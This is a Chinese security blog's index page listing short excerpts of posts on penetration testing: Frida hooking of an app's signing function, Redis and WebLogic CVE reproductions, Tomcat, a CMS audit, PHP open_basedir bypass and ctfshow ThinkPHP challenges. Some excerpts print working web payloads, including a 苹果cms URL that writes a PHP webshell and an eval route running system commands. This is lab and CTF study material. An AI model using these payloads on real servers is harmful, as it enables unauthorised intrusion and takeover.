- 博客(96)
- 资源 (6)
- 收藏
- 关注
RSS订阅原创 一些真实的app渗透与算法hook
这个函数是发送请求的一个函数,我们观察一下这段代码,可以看到我们最终发出去的sign参数的组成是:(时间 + 类型 + 未知字符 + 手机号),并且这个未知字符是这个函数的一个参数,那好办了。这回函数需要的参数我们都拥有了,我们直接通过frida的rpc来调用这个函数,直接给我们生成sign , 并简单写个发送请求的脚本,直接实现一条龙。直接hook这个getSmscode函数,看看传来了哪些值,就可以得到这个未知字符,有了这个未知字符我们就可以构建sign。我们逆一下这个app,试试找到他的加密算法,
2023-09-20 05:07:32
501
1转载 redis攻击总结
redis的那几种攻击方式在这几年的赛题还是实战中几乎已经被玩烂了,原理也就那些东西,主要就是通信的RESP协议,所以再总结感觉也可能也学不到太多东西,所以就直接看了xq17师傅的文章感觉写的很好就直接转载了xq17师傅的文章,但是师傅这里写错了一个问题,就是redis在高版本中module load出错的原因不是exp的不规范,而是在高版本中增加了相关的权限验证,详情在https://github.com/redis/redis/pull/6257 这个commit里面注:以下内容原创来自于xq17师傅
2022-02-24 17:20:31
2110
原创 javaSec-Servlet的线程安全问题
javaSec-Servlet的线程安全问题刚开始看见关于这的知识点是在p神的知识星球看见y4师傅发的,后来又看见了vnctf用了这个知识点,就简单的写下。这里直接拿easyJava这题的题目环境当了demo:刚开始有个任意文件读取,直接读Servlet文件反编译下先看HelloWorldServlet://// Source code recreated from a .class file by IntelliJ IDEA// (powered by FernFlower decompile
2022-02-20 19:55:41
3721
原创 javaSec-rmi详解
javaSec-rmi对于rmi这从很久前就接触到了利用,原理也是只简单的了解了一些,一直没有好好的梳理过,最近正好看到了好多相关的资料,顺便写下。前置知识:RPC理解RPC可以从他的名字开始,RPC的全称是Remote Method Call,顾名思义就是远程方法调用,RPC呢他不是一个框架也不是一个协议,是一个概念性的东西,只是远程通信的一种方式,区别其他远程通信的方式,他是其中的一种,这种概念性的东西,可能从定义说起来很烦,所以我尽量从代码的方式来理解。从单机到分布式->分布式通信 :就
2022-02-12 18:50:59
582
原创 linux内网-cfs2
linux内网-cfs2苹果cms:有个rce的洞:getshell payload(a):index.php?m=vod-search&wd={if-A:assert($_POST[a])}{endif-A}fput写马,test.php 密码test:index.php?m=vod-search&wd={if-A:print(fputs%28fopen%28base64_decode%28dGVzdC5waHA%29,w%29,base64_decode%28PD9waHA
2022-02-04 20:58:56
1237
原创 Weblogic 未认证远程命令执行(CVE-2020-14882、CVE-2020-14883)
Weblogic 未认证远程命令执行(CVE-2020-14882、CVE-2020-14883)漏洞环境:vulhub漏洞复现:CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证。CVE-2020-14883 允许经过身份验证的用户在管理员控制台组件上执行任何命令。使用这两个漏洞的连锁,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执行任意命令并完全控制主机。1.docker 开个环境:...
2021-11-04 20:42:23
3693
原创 Weblogic 常规渗透测试之利用文件读取漏洞getshell
Weblogic 常规渗透测试之利用文件读取漏洞getshell漏洞环境:vulhub复现步骤:1.起一个存在任意文件读取的demo:file,jsp存在漏洞3.读取后台用户密文与密钥文件weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,名为SerializedSystemIni.dat和config.xml,在本环境中为./security/SerializedSystemIni.da
2021-11-04 18:37:47
2785
原创 Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)复现环境:vulhub漏洞原因:Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。复现过程:启动一个执行反弹shell的一个JRMP Server:payload:java -cp ysoserial-master-8eb5cbfbf6-1.
2021-11-03 15:07:07
2593
原创 Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞(CVE-2017-10271)
Weblogic < 10.3.6 “wls-wsat” XMLDecoder 反序列化漏洞(CVE-2017-10271)复现环境:vulhub漏洞原因:Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。详细原因:https://www.cnblogs.com/hetianlab/p/13534535.html复现过程:访问显示404,weblo
2021-11-02 18:57:30
243
原创 Weblogic 任意文件上传漏洞(CVE-2018-2894)
Weblogic 任意文件上传漏洞(CVE-2018-2894)影响版本:Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3。复现环境:vulhub漏洞条件:Web Service Test Page 开启。注:Web Service Test Page 在“生产模式”下默认不开启漏洞原因:Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限复现步骤:1,从config.do上传先登入
2021-11-01 19:52:51
808
原创 PHP绕过open_basedir
1. 命令执行函数open_basedir的设置对系统命令执行函数无效<?php$cmd="cat ../1.txt";file_get_contents($cmd);echo"file_get_contents finsh"."\n"."-----------------------"."\n";system($cmd);echo shell_exec($cmd);echo exec($cmd)."\n";passthru($cmd);$fp = popen($
2021-09-05 15:57:23
295
转载 java的命令执行与bypassRASP
关于php的webshell相信大家已经很了解了,webshell就是相当于可以控制目标服务器的一小段代码。今天讲下java的webshell以及bypassRASP。java的命令执行一般都是通过Runtime类的Runtime.getRuntime().exec()方法来执行,来看一段demo (建议练习审计时不要用docker的环境,建议idea启动):看一下执行效果:OK,这一段代码就是一个简单的webshell。接下来我们简单的看下调用链:...
2021-09-01 16:41:48
1250
原创 ctfshowThinkphp
web569web570/index.php/Home/ctfshow/assert/eval($_GET[1])/?1=system("tac%20/f*");闭包路由:参考官方文档或博客web571给了源码,找到一处可以进行传参的控制器,传个参数在这,打个断点调下:接着跟进去:接着跟进:我们最开始传的参数在content变量里,跟进到if(这里有个对于当前使用的一个模板的判断,由于不知道题目使用的是哪种所以我就用0,1了图方便):往下走:成功找到后门,conten
2021-08-24 16:54:15
285
原创 tomcat弱口令
tomcat弱口令1.前置知识war包:war是一种web应用程序格式,包含了web应用程序中的所有内容。在这个文件中的所有内容将按一定的目录结构来组织,一般情况下war文件中包含了html,jsp文件或者含有这两种文件的目录。另外它里面还含有一个web-inf目录,在这个目录下存放的是应用配置文件web.xml以及classes目录,classes目录里面包含了编译好的Servlet类和Jsp或Servlet所依赖的其它类。由于war文件将所有的文件合并成一个,因此减少了文件的传输时间2.漏洞环境
2021-08-20 15:06:53
1171
原创 Tomcat任意写入文件漏洞CVE-2017-12615
Tomcat任意写入文件漏洞漏洞原理:在web.xm文件中Tomcat设置了写权限(readonly=false),导致我们可以向服务器写入文件。
2021-07-23 15:07:04
261
原创 梦想cms1.4审计
梦想cms1.4审计一个简单的mvc,直接去看配置文件和控制器,配置文件中无waf:先来后台的,后台的都比较容易sql注入1BookAction.class.php文件:有传参,跟进下getReply方法:进行了字符串拼接操作,并且返回调用了父类的selectModel方法,跟进下:又调用了父类的selectDB方法,跟进下:进行了sql查询并且我们可以控制 $sqlStr变量,打印下sql语句:闭合构造下payload:...
2021-07-22 11:19:31
565
原创 java类加载器机制——3.URLClassLoader
URLClassLoader继承了ClassLoader,URLClassLoader提供了加载远程资源的能力,在写漏洞利用的payload或者webshell的时候我们可以使用这个特性来加载远程的 jar 来实现远程的类方法调用。TestURLClassLoader.java 示例:import java.io.ByteArrayOutputStream;import java.io.InputStream;import java.net.URL;import java.net.URLClass
2021-07-14 17:37:52
890
转载 java类加载器机制——2.自定义一个ClassLoader
ClassLoader一切的Java类都必须经过JVM加载后才能运行,而ClassLoader的主要作用就是Java类文件的加载。在JVM类加载器中最顶层的是Bootstrap ClassLoader(引导类加载器)、Extension ClassLoader(扩展类加载器)、App ClassLoader(系统类加载器),AppClassLoader是默认的类加载器,如果类加载时我们不指定类加载器的情况下,默认会使用AppClassLoader加载类,ClassLoader.getSystemClass
2021-07-14 17:37:18
366
原创 java类加载器机制——1.java的类加载及类加载器机制
(最开始在github上发布的,有的图片不知为啥在这打不开贴个gayhub原文地址:https://github.com/wa1ki0g/javasec)我们在学习java编程时,大概都知道java文件的执行顺序,即先编译成class文件即字节码文件,然后再移交给java虚拟机去进一步翻译执行这些文件。但是我们却不知道类加载过程的真正的细节。在jvm的启动是通过,引导类加载器(bootstrap class loade)创建加载一个初始类来完成的,jvm组成结构之一就是类装载器子系统,今天我们先从这个
2021-07-14 17:36:27
198
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人